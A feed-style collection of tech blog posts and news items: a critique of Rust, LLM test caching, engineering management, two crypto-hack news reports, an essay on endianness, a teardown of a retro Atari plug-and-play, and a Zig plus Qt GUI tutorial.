Memory safety is not that sacred. In fact, for many applications malfunctioning is better than crashing — particularly in the embedded world where Rust wants to be present. You cannot get 99.999% reliability with Rust — it crashes all the time.
When handling lots of mutable shared state (GUI, DB, stateful services, OS/hardware), the performance of Rust’s native memory model is subpar, and escaping it with unsafe just leaves you with slow compilation, high complexity, and no memory safety in the end — which makes Rust practically meaningless for heavy mutable-state jobs.
C++ actually sucks
There is no doubt about it. Undefined behavior (UB) is a fundamental aspect of the language; you don’t simply encounter UB — the whole language is built on UB. You do array indexing and you immediately encounter UB, because the language just does not check out-of-bounds access. I want to emphasize that lots of UBs are not even justified by performance matters — it’s an outright sloppy design of C carried over and amplified in C++. I can go all day long about how C++ sucks:
implicit type conversions, implicit copies, implicit constructors, implicit object slicing, and pretty much everything implicit;
function overloading (implicit), particularly considering its omnipresence in STL;
non-uniform error handling with exceptions as afterthought;
still #include-ing text files 40 years after C and One Definition Rule barely checked by compilers;
unsound combination of paradigms (good luck overriding a generic function in descendant classes);
SFINAE nuisance as a core mechanism of generic programming;
T, T&, T*, std::optional, std::unique_ptr to describe similar things, each broken in its own way. Put a const cherry on top of it.
So C++ is complex, unsafe, and its compiler is slow. How does Rust (not) fix those issues?
1. Compilation speed
Rust FAQ
explains that there are many efforts to optimize it, like a better frontend, MIR, and so on. But the MIR effort started in 2015 and it still fails to significantly speed up compilation (although it does speed up compiler checks).
Unfortunately, it’s impossible to make Rust compile fast. The problem is inherent to all similar generics-heavy languages, like Haskell. Arguably, Rust is closer to Haskell than it is to C++. You can also say it’s close to a template-heavy C++ — and template-heavy C++ code exhibits the same problem of slow compilation.
When you do for i in 0..limit {} — you don’t just iterate: you create a range, you create an iterator, you iterate over it — all of it monomorphized to your concrete types, and all of it has to be optimized individually (non-optimized Rust code is insanely slow; it’s mostly unusable even for debugging).
Put a non-optional borrow checker on top of it — and there you have your insanely slow compiler. And you WILL recompile a lot, because the borrow checker is relentless.
2. Complexity
You just cannot avoid it. You cannot go along like “I’m writing cold-path, high-level code, I don’t need performance, I don’t need to go deeper into lifetime handling, I just want to write high-level logic”. You will be forced into the low-level nuances every time you write a single line of Rust. There is no garbage collector for Rust, and there never will be — you have to semi-manually pack all your data into a tree of ownership. You have to be fluent in ownership, borrowing, and traits to write just a few lines of code.
As I’ve already mentioned, this makes it very hard to write high-level logic in Rust. That’s why many early Rust adopters actually revert to Node.js and Go for less performance-sensitive services — high complexity combined with slow compilation makes it impractical to write anything complex in Rust alone.
3. Memory safety
There are two uncompromising things in the Rust fundament: performance and memory safety. I have to argue that Rust’s designers went wa-a-ay overboard with memory safety. You know the containers are actually implemented with unsafe functions, because perfect correctness is just not possible in the Turing machine model — you have to build safe programs from carefully arranged unsafe building blocks. Node.js and Go are considered practically safe languages. Rust sacrificed sanity and practicality for memory safety — and gets none of them at the end of the day; it’s still not 100% memory safe.
Now, speaking about practicality — lots of use cases just don’t need perfect memory safety. There are ways to implement unsafe programs that still don’t execute remote code or leak secrets — they only corrupt user data and act sporadically. If a pacemaker stops, telling the victim “but the memory was not corrupted in the crash” is a weak consolation. We actually had a recent Cloudflare outage caused by a crash on an unwrap() call:
https://blog.cloudflare.com/18-november-2025-outage/
It’s probably the strongest point of my whining:
Rust is memory safe and unreliable. The price of memory safety was reliability, in addition to the developer’s sanity — that’s why I say the language designers went overboard. They sacrificed a core practical quality for an abstract principle of memory safety. Just like Haskell’s designers sacrificed practicality for purity — that’s why I keep drawing parallels between Rust and Haskell.
4. Shared mutable state
Handling it in Rust is possible, but it just makes no sense: you lose most of the advantages and are left with all the deficiencies of Rust. Pretty much all of the successful Rust projects employ shared read-only state, one-way data flow, and acyclic data structures: the rustc compiler, the mdbook and pulldown-cmark Markdown tools, Actix and Axum for stateless handlers, append-only blockchains, single-threaded WASM. The model is, once again, very similar to Haskell, which also excels at parsers, stateless handlers, and mostly-non-interactive CLI tools, and was employed in blockchains.
Early prototypes of Rust actually had Software Transactional Memory (STM) as an option for safe concurrency; however, STM has performance penalties and requires simple but significant runtime support.
Step into shared mutable state — and there memory corruption is not an exception, it’s the rule. You have to handle the corruption, you cannot simply crash. Borrow checker, ownership? Just useless: you cannot analyze ownership in a cyclic graph without a GC-like algorithm.
Sync/Send, Mutex, and reference counting (Arc)? Unfortunately, those lock or simply mess with CPU caches badly, so they are inefficient for multithreaded communication, at least intensive communication. They are safe, but inefficient. Which kinda destroys the first uncompromising thing in Rust — performance. So, to reiterate, the second you step into shared mutable state you lose every single advantage of Rust. Which is kinda rational, considering that the main concept of Rust was to never employ shared mutable state.
In particular, GUI is mutable shared state. Hence we don’t see any big GUI projects in Rust. Zed IDE has been in beta for so many years — I can almost feel the pain of the developers hacking their way through the borrow-checker jungle just to realize their logic is bug-ridden, and they are yet to implement dozens of other features.
Big databases, scalable stateful services, operating systems, at least significant Linux modules? Yet to be seen.
Summary
So, is Rust bad or good? It’s neither. It’s a mediocre programming language with thousands of man-months put into its development — this fact alone makes Rust a viable tool, just because you can pick it off the shelf and employ it as-is. This blog was generated with Zola, which is written in Rust — I did not have to write a single line of Rust code to use it. And Rust is a good fit for the Zola SSG because of its non-interactive nature with a one-way flow of immutable data. Just, please, don’t run around screaming “we should all switch our development to Rust because it’s the best programming language”.
Earlier I described
surface testing
, which is still how I go about testing systems.
Lately, I co-developed a system that performs document extraction partly with the help of LLMs, which brought an interesting twist: we have dozens of test cases where we extract the documents and assert things about them. Running the whole thing, however, takes 20-30 minutes and costs 1-2 bucks, simply because of the LLM calls.
I’ve resisted the temptation to write mocks for these. I’ve also resisted the stronger temptation to not run extractions as part of the test suite. Instead, we just cache the results of previous extractions, so that we can save on time and money when running the tests. This has the following advantages over mocking:
No manual copy-pasting required: the test suite itself creates the caches when running.
In the absence of a cache, you can simply recreate it by running the tests.
We can override some (or all) caches to re-test that part.
All the non-external parts of the code still run every time.
The caches are accessed by a conditional piece of code that only works in local development. The data stored in the file is exactly what we’d get from the external call. I believe this can be used for most surface testing that involves slow, expensive calls.
The trigger for renewing the caches is when the logic in question is being re-tested. When other parts of the system are tested, they can still rely on the extraction suite without paying a performance cost.
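A minimal sketch of that cache-or-call layer, in Python (the directory, file names, and function names here are illustrative, not the author's actual code):

import hashlib
import json
import os

CACHE_DIR = ".extraction-cache"  # hypothetical location, only used in local development

def cached_extract(document_path, extract_fn):
    """Return the cached extraction for this document if we have one,
    otherwise run the real (slow, paid) extraction and cache its result."""
    os.makedirs(CACHE_DIR, exist_ok=True)
    with open(document_path, "rb") as f:
        key = hashlib.sha256(f.read()).hexdigest()
    cache_path = os.path.join(CACHE_DIR, key + ".json")
    if os.path.exists(cache_path):
        with open(cache_path) as f:
            return json.load(f)          # cache hit: no external call, no cost
    result = extract_fn(document_path)   # cache miss: the expensive LLM-backed call
    with open(cache_path, "w") as f:
        json.dump(result, f)             # store exactly what the external call returned
    return result

Deleting one cache file (or the whole directory) is the override step: the next test run re-extracts just that part.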
"Good engineering management" is a fad
Simon Willison
simonwillison.net
2025-11-23 21:29:09
"Good engineering management" is a fad
Will Larson argues that the technology industry's idea of what makes a good engineering manager changes over time based on industry realities. ZIRP hypergrowth has been exchanged for a more cautious approach today, and expectations of managers has cha...
"Good engineering management" is a fad
(via) Will Larson argues that the technology industry's idea of what makes a good engineering manager changes over time based on industry realities. ZIRP hypergrowth has been exchanged for a more cautious approach today, and expectations of managers have changed to match:
Where things get weird is that in each case a morality tale was subsequently superimposed on top of the transition [...] the industry will want different things from you as it evolves, and it will tell you that each of those shifts is because of some complex moral change, but it’s pretty much always about business realities changing.
I particularly appreciated the section on core engineering management skills that stay constant no matter what:
Execution: lead team to deliver expected tangible and intangible work. Fundamentally, management is about getting things done, and you'll neither get an opportunity to begin managing, nor stay long as a manager, if your teams don't execute. [...]
Team: shape the team and the environment such that they succeed. This is not working for the team, nor is it working for your leadership, it is finding the balance between the two that works for both. [...]
Ownership: navigate reality to make consistent progress, even when reality is difficult. Finding a way to get things done, rather than finding a way for its not getting done to be someone else's fault. [...]
Alignment: build shared understanding across leadership, stakeholders, your team, and the problem space. Finding a realistic plan that meets the moment, without surprising or being surprised by those around you. [...]
Will goes on to list four additional growth skills "whose presence–or absence–determines how far you can go in your career".
GANA Payment hacked for $3.1 million
Web3 Is Going Great
web3isgoinggreat.com
2025-11-23 21:28:49
An attacker stole approximately $3.1 million from the BNB chain-based GANA Payment project. The thief laundered about $1 million of the stolen funds through Tornado Cash shortly after. The attacker was able to transfer ownership of the GANA contract to themselves, possibly after a private key leak.
The theft was first observed by crypto sleuth zachxbt. Not long after, the project acknowledged on its Twitter account that "GANA's interaction contract has been targeted by an external attack, resulting in unauthorized asset theft."
Say you want to send a list of consumer records to another microservice over network via JSON. There are three concepts at play in this process:
A logical value, which is how we humans treat the data. In this example, this would be “a list of consumer records”. This description does not specify how it’s represented in the computer, or whether you’re using a computer at all.
A data type, e.g.
std::vector<ConsumerRecord>
. The purpose of a data type is two-fold: a) it denotes a specific runtime representation of the logical value in computer memory, b) it provides an abstraction so that you can work with the logical value without thinking about this implementation detail.
A serialization format, here JSON. It denotes an alternative, byte sequence-oriented representation of the logical value, but does not provide an abstraction layer, since you cannot directly work with the records encoded in the JSON string.
These concepts are mostly orthogonal. You can switch from
vector
to a linked list, or even change the programming language, affecting only the data type. You can also talk to a different microservice via XML without changing the way your application handles data.
Typically, libraries provide (de)serialization functions to convert between data types and serialized data.
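For illustration, here is that shape in Python rather than the C++ of the running example (the names are generic, not from a particular library):

import json
from dataclasses import dataclass, asdict

@dataclass
class ConsumerRecord:
    id: int
    name: str

def serialize(records: list[ConsumerRecord]) -> str:
    # data type -> serialization format (JSON text)
    return json.dumps([asdict(r) for r in records])

def deserialize(payload: str) -> list[ConsumerRecord]:
    # serialization format -> data type
    return [ConsumerRecord(**fields) for fields in json.loads(payload)]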
Now, let’s apply the same idea to integers transferred via a binary protocol. We have:
A logical value, “integer”. This corresponds to the abstract concept of a number, not necessarily linked to computing or even the decimal numeral system. 12-fingered aliens would be aware of the same concept, even though they might communicate it differently.
A data type used for manipulation, e.g.
int
or
uint32_t
. You can do arithmetic on integers without concerning yourself with how the CPU handles it. For all we know, the integer might as well be encrypted with AES – as long as the abstraction agrees that
2 + 2 == 4
, any implementation is fine.
A serialization format that describes how the integer is encoded into a sequence of bytes. The most straightforward approach is to split the number into 8-bit parts and write them in sequence in some order. The most common orders are called “little-endian” and “big-endian”.
Here’s what the C API for (de)serializing integers looks like: both htonl and ntohl take a uint32_t and return a uint32_t. htonl tries to be serialize, and ntohl tries to be deserialize – emphasis on “tries”.
uint32_t
is supposed to be an abstraction, a computer implementation of the concept of “integer”. So why is the serialized data, logically a sequence of bytes, also considered an integer? This makes no sense, given that we’re trying to reduce the complexity of data. And it’s not even an “integer” in the sense of a data type, since operating on the values returned by
htonl
(say, by adding them together) produces gibberish.
If a socket can only handle byte streams, and we couldn’t send
std::vector<ConsumerRecord>
until it was converted to a byte sequence, it doesn’t make much sense to directly send
uint32_t
like
htonl
wants us to. It’s a category error. Really, the only reason this works is that the runtime representation of an integer – i.e. the byte layout of the
uint32_t
data type – is
remotely similar
to the intended serialization format. And by “remotely similar”, I mean “has identical length and valid bit patterns”.
htonl
is an ugly hack: it patches the runtime representation such that its byte sequence matches the intended output, without consideration for the meaning of the new value represented by the data type.
Can you imagine doing anything like that with any other type? Reordering bytes of
std::vector
would be madness and lead to UB galore. A hypothetical function like
bool htonb(bool hostbool)
, where the “host bool” is represented by bytes
0
or
1
, and the “network bool” is represented by
0
or
0xFF
, could not be implemented with certain ABIs, let alone without causing UB. And in many cases, the runtime and the serialized representations aren’t even guaranteed to have equal lengths.
Really, the only reason why
htonl
doesn’t return
char[4]
and
ntohl
doesn’t take
char[4]
is that C doesn’t support arrays in this position. This is exclusively a language deficiency. A better language would never expose functions with such signatures, and indeed, Go, Python, and Java all get this right.
But my point is not to bash C.
My point is that this API quirk fundamentally changes how people think about endianness, making them commit mistakes they wouldn’t make otherwise. Many people think
integers have an intrinsic endianness
, or prefer textual formats to seemingly avoid dealing with endianness, and I have held all these convictions myself at some point.
It’s not that people are stupid. It’s borderline impossible to make the same mistakes if you treat endianness as a parameter of a serialization format. But C doesn’t want you to think about it this way, and so you never realize you were lied to until you get a reason to think hard about it.
man
pages and tutorials on the internet concurring that
ntohl
“converts a number from network order to host byte order” only make this worse.
How do I know this is the case? Beyond personal experience, it turns out that Rust offers methods like
u32::to_le
with this broken signature. Granted, it also supports the sane version
u32::to_le_bytes
, but it was added much later.
to_le
was never deprecated, and is still documented straightforwardly without a hint to prefer
to_le_bytes
instead. I can only interpret this as a historical mistake that is so ingrained in developers’ brains that it’s not immediately obvious.
My plea is to educators: please teach endianness differently. Introduce it as a parameter of a specific serialization format. Highlight native endianness as an implementation detail that doesn’t matter as long as you’re only using abstractions like
int
. Explain that numbers don’t have endianness. Elaborate that, much like JSON can be parsed by an architecture-agnostic algorithm and then becomes irrelevant, both little-endian and big-endian (de)serialization can be performed without knowing the native endianness or exposing the endianness of the original data. Recommend type-safe APIs if possible. Highlight
ntoh*
/
hton*
as a misdesigned non-type-safe API and tell people they’re going to be met with misinformation online.
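To make that concrete, here is endianness as nothing more than a parameter of the serialization step, shown in Python (one of the languages the author credits with getting this right):

value = 0x12345678

# Serialization: endianness is an explicit parameter of the byte format...
little = value.to_bytes(4, "little")   # b'\x78\x56\x34\x12'
big = value.to_bytes(4, "big")         # b'\x12\x34\x56\x78'

# ...and deserialization needs the same parameter, nothing else.
assert int.from_bytes(little, "little") == value
assert int.from_bytes(big, "big") == value

# The same thing written with shifts: portable, and the host's native
# endianness never enters the picture.
def serialize_u32_le(v: int) -> bytes:
    return bytes((v >> (8 * i)) & 0xFF for i in range(4))

assert serialize_u32_le(value) == little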
Aerodrome and Velodrome suffer website takeovers, again
Attackers redirected users intending to visit the websites for the
decentralized exchanges
Aerodrome and Velodrome to their own fraudulent versions using DNS hijacking, after taking control of the websites' domains. The platforms urged users not to visit the websites as they worked to regain control.
This is the second time such an attack has happened to these same platforms, with another DNS hijacking incident occurring almost exactly two years ago. In that instance, users lost around $100,000 when submitting transactions via the scam websites.
Some things I like to talk about on this blog are “paddle” games that use a potentiometer to control the player position, and plug-and-play consoles. Oh, and the
Atari 2600
. Well, it just so happens that Jakks Pacific in 2004 released something that combines both of them: the Atari Paddle. It’s like they had this blog in mind.
Hardware
The Atari 2600 had a few different types of controllers used with it. The four-way joystick is the most famous, but second to that are probably the paddles. After all, this was an era where
Pong
could still be a selling point for your game; well, if you dressed it up and called it
Video Olympics
, anyway.
You might notice a big difference from the real Atari paddles, though. Not only are there a few more buttons and switches, but there's only one paddle! The real Atari paddles actually came in pairs, with both plugged into a single controller port; paddle games were very much multi-player focused. And yet, when Jakks put out the Atari Paddle, they had both one-player and two-player versions. And I got the one-player.
While this is mostly fine, it has some interesting implications. For example, in
Street Racer
above, the left player mostly sits there getting into car crashes. For
Pong
, a game that they included in addition to
Video Olympics
, they had to implement a CPU player.
So it’s pretty clear that this thing is not running the original Atari 2600 games. Take a look at the other arcade game included,
Warlords
, and you’ll also realize that this isn’t running Atari 2600 hardware at all. There may be a lot of magic in modern 2600 homebrew, but the console just can’t put out pixels that small.
So, what is it?
In 2004, Atari put out the Atari Flashback 1, designed by Legacy Engineering. Well, they didn’t call it the Atari Flashback 1, just the Flashback. Surprisingly for something that looked like an Atari 7800, this machine was based on the ubiquitous NES-on-a-chip (“NOAC”) hardware. That’s right; if you can extract the ROMs, you can play their games on, say, a Twin Famicom. It’s particularly obvious in
Yars’ Revenge
, with its colorful neutral zone. Here’s a screenshot I took from the Atari 2600:
And here’s one from the NOAC port. Notice that the NES cannot display as many simultaneous colors on a single screen as the Atari 2600 (the one advantage of that ancient technology), so the neutral zone is much less varied in color. (However, in motion, aggressive palette-cycling makes this less obvious.)
So a lot of people have assumed that the Atari Paddle is also based on NOAC hardware. After all, the NES did have a paddle controller (used for
Arkanoid
), so that’s no obstacle. And
Warlords
in particular does really look like an NES game.
But it’s worth noting that this device was made by an entirely different team than the Flashback console; the Flashback was designed by Legacy Engineering, and the Atari Paddle by Digital Eclipse Vancouver.
But there’s one other thing that really blows the NOAC theory out of the water. The game select screen. Sorry, you’re just not getting that many colors or detail on
Famiclone hardware.
Could it be one of the
enhanced
V.R. Technology NOACs? They did substantially expand the capabilities of the NES architecture. Well, you can actually read their
datasheets
today, and judging by the dates on them, they’re from mid-2005 at the earliest; it seems unlikely they’d be available in time for the Atari Paddle’s release a year earlier.
So, usually I’d go to MAME and just explain to you what someone there already figured out. But here’s a surprise: MAME doesn’t actually have the Atari Paddle! At least, I couldn’t find it. These things are reverse engineered by people, so it’s not surprising that they haven’t gotten 100% yet.
Should we crack it open?
If you were expecting anything other than unlabeled epoxy blobs, I don’t know what to tell you. This is 2004. Interestingly, unlike some of the other plug and plays I’ve taken apart, this doesn’t seem to have any possibility of using a ROM chip either; I guess because of the small size of the PCB.
I didn’t really do a great job maneuvering the PCB to show the back, but the only interesting thing worth noting is the label EL-555A1 with a datecode of 2004.05.08, and that weird sticking-upward PCB in the spot for a DIP chip, labeled EL-555C1. I’m not sure what this is; an analog-to-digital converter for the paddle, perhaps? Though if you look at the pads on the other side, they seem to go to a missing transistor Q1 and the larger blob. It must do
something
. If you have the capability to decap these chips, then I may be up for sacrificing this little toy for the cause.
Internet archaeology
The
AtariAge Forum
, where the Atari experts hang out, has discussed the paddle before. They seem to like the paddle for the cheap toy it is, but the most interesting comment is from user onmode-ky.
FYI, the system was programmed by Jeff Vavasour’s team at Digital Eclipse Vancouver, using what was described as “partial emulation.” The underlying hardware seems to have been a Winbond W55x-family microcontroller, which is 65C816-compatible. Years later, after the closure of Digital Eclipse Vancouver, Vavasour’s current Code Mystics studio would develop the first Jakks Pacific plug-n-play game system running entirely via software emulation, their 2011 Taito (“Retro Arcade featuring Space Invaders”) system.
I’m not sure what “partial emulation” means. Perhaps some of the 6502 code from the original games was reused? (The 65C816
is
backwards compatible) But the Atari 2600’s graphics system is so different from anything else that I have to assume only a small part of the logic could possibly be shared. Still, it sounds plausible enough.
Taking a look at MAME, I found one Winbond-made SoC that used a 65C816 CPU. The
“trkfldch”
core emulates a Winbond BAx-family chipset, used by Konami for the 2007
Track and Field TV Challenge
plug-and-play game. I thought about getting one, but it’s one of those floor mat things and it sounded like exercise.
Image from
YouTube
user ClawGrip. Used under presumed fair use.
This is probably about as far as I’ll get in figuring out what’s running in this thing without decapping or other more invasive forms of research, unfortunately. Instead, let’s just play some more games.
The Lineup
These screenshots of the menu screen are really muddy, aren’t they? That just seems to be how it looks; my guess is the composite encoder here isn’t the highest-quality. As for the gameplay, certainly single-player games like
Breakout
,
Super Breakout
(different games),
Circus Atari
,
Demons to Diamonds
, or
Night Driver
play how you’d expect, as do
Steeplechase
and
Warlords
, which are just stuck in one-player mode.
There’s definitely something odd going on with the rendering of multi-line effects, which are pretty much everywhere on this system. Look at the rendering of the defeated enemies in
Demons to Diamonds
, for example. These weird patterns seem to be everywhere; in the real game, they’re skull and crossbones. They’re inconsistent on a game-by-game basis, though– the
Circus Atari
score uses a similar effect and renders fine.
This is despite the fact that in other games, a high degree of accuracy is made. For example, did you know that
Casino
on the 2600 was a paddle game?
Did you care?
Notice those weird lines on the side; those happen when you strobe the HMOVE register, which applies fine horizontal movement. They're very common in 2600 games and many games don't bother to hide them; you can see them in
Demons to Diamonds
above too.
Night Driver
on the 2600 is a first-person racing game that creates its unique perspective by constantly flickering; I can't show you a single screenshot because no single frame renders everything, but try pausing the video below. (Warning: it's very flickery, and ends with a full-screen color flash. This could cause issues for those with photosensitivity.) This effect is recreated faithfully, as are the
HMOVE
bars, which you can see during the color flash.
One thing you might have noticed about the Atari Paddle is that it seems to be missing a lot of controls. The Atari 2600 didn’t just rely on the button on the paddle; it used the many toggles and switches on the console itself to configure the game you’re playing. Well, most of those controls have been moved to software; pressing the large red “menu” button brings up a list of commands.
The two-player mandatory games are handled in different ways. As noted,
Street Racer
above just gives you a second player who doesn’t do anything.
Video Olympics
(the 2600’s name for
Pong
) meanwhile seems to give you the same AI from the “arcade” version of
Pong
. Of course, you have a smaller play area, so that will impact difficulty.
Must you play Atari today?
The Jakks Atari Paddle was released in 2004. Given that the 2600 was released in 1977, and this blog post is being written in 2025, this makes it more or less equivalent to what a retro release of the Sega Dreamcast would be today. So that's exciting.
Overall I think the Atari Paddle is about where it should be. If you find one cheap in a bargain bin, it can be fun to play. I think the included 2600 version of
Warlords
is actually more fun than the included port of the arcade version, and if you’re absolutely desperate for single-player
Video Olympics
, this might be your only choice. But there’s no reason to go seeking it out. This, like all of Jakks Pacific’s contemporary releases, is nothing more than a fun novelty. That’s all it was meant to be.
UPDATE
: Thank you to
“The Dude” on Bluesky
for pointing me to Jeff Vavasour’s own site
here
. I recommend reading it; there are lots of nice details on how they reverse engineered the 2600 titles, and Jeff even notes that he himself drew the Atari 2600 on the menu screen. Nice!
Why Zig + Qt Feels Like Doing the Impossible Right
Zig and Qt make for a surprisingly effective combination for cross platform GUI development.
Preface
Make sure to check out the library
libqt6zig
and give it some love on GitHub. rcalixte has done an amazing job with it, and it's a solid library with a ton of potential.
Intro
It's no secret that I love Zig, and it's also no secret that my favorite GUI framework by far is Qt. So naturally, when I discovered that there were Zig bindings for Qt, I had to give them a try and build something. I decided to build a fairly rudimentary shopping list application: nothing fancy, just one of the standard things I like to build when exploring a new GUI framework. A shopping list app is simple enough not to get in the way of learning the framework, but complex enough to cover a lot of the basic concepts you'll need when building a GUI application, such as handling user input, displaying data, responding to different events, and sorting and filtering the data.
The Library
For this article and experiment I went with
libqt6zig
. There are other bindings libraries out there for Zig, but they are QML-based, whereas libqt6zig is a direct binding to the Qt C++ API, which I tend to prefer. It also interested me a lot more because direct bindings are generally more performant and a lot harder to do correctly, so I wanted to see how well it was implemented and how well it worked in practice. The results were frankly surprisingly good: I was able to build a fully functional shopping list application with it in a relatively short amount of time, with minimal friction or trouble. I did manage to segfault a couple of times, but that's to be expected and honestly half the fun; it made me kinda nostalgic, in fact. I've also spoken about the library with its author and maintainer
rcalixte
who is a super nice and helpful guy with an enthusiasm for tech and programming that is infectious and I can really relate to. So honestly if you’ve ever done any GUI programming before and you’re interested in trying out Zig for GUI development I highly recommend you give libqt6zig a try, it’s a solid library with a ton of potential.
The Experience
The very first touch point is the installation of the bindings into your Zig project. This is fairly easy and well documented here. After you install all the dependency libraries, you can initialize your new Zig project with zig init as you always would. Then you simply need to add the libqt6zig bindings to your project; you can do this a number of ways, but my personal favorite is to simply use zig fetch --save git+https://github.com/rcalixte/libqt6zig.
What does Zig fetch do?
The zig fetch command will add the specified dependency to your build.zig.zon with two fields, url and hash. The url field is the URL of the git repository, and the hash field is a hash of the commit at the time you added the dependency; this ensures that your project will always use the same version of the dependency even if the repository is updated later on. You can also pin a specific commit in your zig fetch command by adding #<commit-hash>, like so: zig fetch --save https://github.com/username/repository/archive/<commit>, which will essentially lock your dependency to that specific commit. Note that even if you omit the commit, zig fetch will still lock your dependency in build.zig.zon to the latest commit at the time you added the dependency.
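The resulting entry in build.zig.zon looks roughly like this (the values below are placeholders; zig fetch writes the real URL and hash for you):

.dependencies = .{
    .libqt6zig = .{
        .url = "git+https://github.com/rcalixte/libqt6zig#<commit-hash>",
        .hash = "<hash written by zig fetch --save>",
    },
},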
Zig then fetches the contents of the repository and stores it in your Zig cache directory (.zig-cache), so that it does not need to refetch it on every build, nor does it need internet connectivity every time you build your project.
Using the Library
We're not quite done yet. After you've added the dependency to your project, you need to actually link it in your build.zig file. This is fairly straightforward as well: you add a few lines to build.zig so that zig build knows to link the libqt6zig library when building your project. Luckily rcalixte has documented this process well in the Usage section of his readme. I recommend you check it out for the full details, as it is subject to change and a link to the readme will always be the best source for the most up-to-date information.
OK Now let’s Build Something
This is what we are building:
So, as I've mentioned, I decided to build a simple shopping list application: nothing fancy, just a basic CRUD application that lets you add items to your shopping list and mark them as bought. When an item is marked as bought, I want to apply some styling to it, such as a strikethrough effect and a different color, and sort it to the bottom of the list so that unbought items always stay at the top. We also want to be able to clean up the entire list with a single click on "Clear All", or remove only the bought items with a click on "Clear Bought".
Opening the Application Window
The first step in any GUI application is to open the window; I won't make the obvious bad pun here, you're welcome for that by the way. Opening a window with libqt6zig is fairly straightforward: you create a new widget and tell Qt to show it. That widget will serve as the main application window, and everything else will live inside it.
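As a rough sketch (qwidget.New2 and qwidget.Show appear later in this post; the two setter names below are my assumption, based on how libqt6zig mirrors Qt's C++ method names, so check the generated docs for the exact spelling):

const window = qwidget.New2(); // the zero-argument overload of New, explained below
qwidget.SetWindowTitle(window, "Shopping List"); // assumed binding for QWidget::setWindowTitle
qwidget.SetMinimumSize2(window, 400, 520); // assumed overload name for setMinimumSize(int, int)
// qwidget.Show(window) comes later, once everything is wired up.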
You might be confused by the use of New2 here instead of just New. This is because Qt has a lot of overloaded functions, and Zig does not support function overloading, so the bindings library has to create multiple versions of the same function with different names to accommodate that. In this case, New2 is the version of New that takes no arguments, whereas New takes a parent widget as an argument.
After creating the window widget we set its title and minimum size, then we can show it by calling qwidget.Show(window). I will actually do that later, after setting up the rest of the application, but if you are just playing around, feel free to call it right after setting the title and size to see the window pop up.
Setting up the Layout
In Qt, layouts are what make widgets actually show up in a sensible way. To achieve what we have in the screenshot above, we need to set up a vertical box layout, or QVBoxLayout if you are familiar with Qt terminology. A vertical box layout is simply a layout that arranges widgets vertically.
What we have here is a horizontal box layout or
QHBoxLayout
that will contain our input field and add button. We set the spacing between the elements to 6 pixels for a bit of breathing room. Then we create a
QLineEdit
widget which is the input field where the user can type in the name of the item they want to add to their shopping list. We also set a placeholder text to give the user an idea of what to type in. Finally we create a
QPushButton
widget which is the add button that the user will click to add the item to their shopping list. We set its fixed width to 90 pixels so that it doesn’t stretch too much.
That's the nice part about Qt+Zig: every call here is explicit and tells you exactly what it does. No magic or hidden behavior, no global "current layout", no hidden parent assignments, just pure explicitness, which I find a lot nicer to read.
Now we can attach our input row and add button to the horizontal layout and then the horizontal layout to the main vertical layout.
qhboxlayout.AddWidget(input_row, item_input);
qhboxlayout.AddWidget(input_row, add_btn);

// ...More code will go here

// Add the input_row to the main layout
// qvboxlayout.AddLayout(main_layout, input_row);
As you can see we are simply adding the widgets in the order we want them to appear in the layout, then taking that layout and adding it to the main layout. This should produce the top row of our application. But it won’t do much so far, we still need to add the list view and the clear buttons.
Adding the List and Controls
Next up is the list where items will appear and the two control buttons at the very bottom with the labels “Clear All” and “Clear Bought”.
Qt comes with a lot of useful widgets that you can use out of the box, in this case we are using a
QLabel
widget to display the “Items:” label above the list and a
QListWidget
to display the list of items. The
QListWidget
is a convenient widget that allows us to easily add, remove and manipulate items in the list. We also set a bit of styling on the label to make it look a bit nicer, if you are familiar with CSS this should look pretty straightforward to you.
Here we create another horizontal box layout for the control buttons, then we create two
QPushButton
widgets for the “Clear All” and “Clear Bought” buttons. We set their fixed widths to make them look a bit more uniform. Finally we add the buttons to the horizontal layout.
And just like that we can now bring it all together by adding everything to the main vertical layout in order.
qvboxlayout.AddLayout(main_layout, input_row); // input row goes here where it belongs
qvboxlayout.AddWidget(main_layout, list_label);
qvboxlayout.AddWidget(main_layout, list_widget);
qvboxlayout.AddLayout(main_layout, controls_row);
At this point our layout hierarchy looks like this:
Great! Now that we have our layouts and widgets all set up, we can get to my favorite part: the logic and interactivity.
The Context System
One of the more clever parts of this app is how it maps each widget to its corresponding Zig state.
Because Qt signals are C-style callbacks with no built-in state, we use a global hash map to link each widget pointer to its appropriate state.
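A sketch of that mapping, using only the Zig standard library (the Ctx fields are just the ones the handlers in this post need, and register_ctx is a name I made up for the registration step):

const std = @import("std");

const Ctx = struct {
    list_widget: ?*anyopaque, // the QListWidget this state belongs to
    item_input: ?*anyopaque,  // the QLineEdit to read new items from
};

// One global map from a widget pointer to the state its callbacks should act on.
var ctx_map = std.AutoHashMap(usize, *Ctx).init(std.heap.page_allocator);

fn register_ctx(widget: ?*anyopaque, ctx: *Ctx) !void {
    const ptr = widget orelse return error.NullWidget;
    try ctx_map.put(@intFromPtr(ptr), ctx);
}

fn get_ctx_for(widget: ?*anyopaque) ?*Ctx {
    const ptr = widget orelse return null;
    return ctx_map.get(@intFromPtr(ptr));
}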
The only problem and downside with this is that we are relying heavily on opaque pointers, which are not type safe at all, so we have to be extra careful when working with them to avoid segfaults and other memory issues. This is precisely where I ran into some self-inflicted issues and headaches with this application, completely my own fault for accepting a lack of type safety and memory safety for the sake of convenience. But it is what it is; it's not like I was building a production-ready application here. I just wanted to be clever and explore Zig and Qt together, so I accepted the tradeoff. If you decide to build something more serious with this approach, I highly recommend you find a way to make it more type safe and memory safe. This is just an example of me experimenting and exploring.
Hooking up the Logic
Now that we have the UI and context system ready, it’s time to connect everything together. This is where the application actually comes alive.
In Qt, widgets typically use a signal and slot mechanism, where signals (like button clicks) are connected to functions (slots) that respond to those events.
In libqt6zig, these signals are exposed as plain callback functions that you can assign in Zig, so you can handle events like button clicks in a straightforward way.
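A minimal version of that handler, reusing get_ctx_for, qlineedit.Text, and the add_item helper that appear elsewhere in this post (a sketch, not necessarily the author's exact code):

fn on_add_clicked(self: ?*anyopaque) callconv(.c) void {
    if (get_ctx_for(self)) |ctx| {
        // libqt6zig copies the text into an allocated slice we own
        const text = qlineedit.Text(ctx.item_input, allocator);
        defer allocator.free(text);
        if (text.len != 0) {
            add_item(ctx, text) catch return;
        }
    }
}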
We connect this function to the Add button’s clicked signal:
qpushbutton.OnClicked(add_btn, on_add_clicked);
Handling the Clear Buttons
Next, we want to make the “Clear All” and “Clear Bought” buttons actually do something. The logic is simple:
Clear All
: Remove all items from the list.
Clear Bought
: Remove only items that have been marked as bought (we’ll handle this later by checking a property or style on each item).
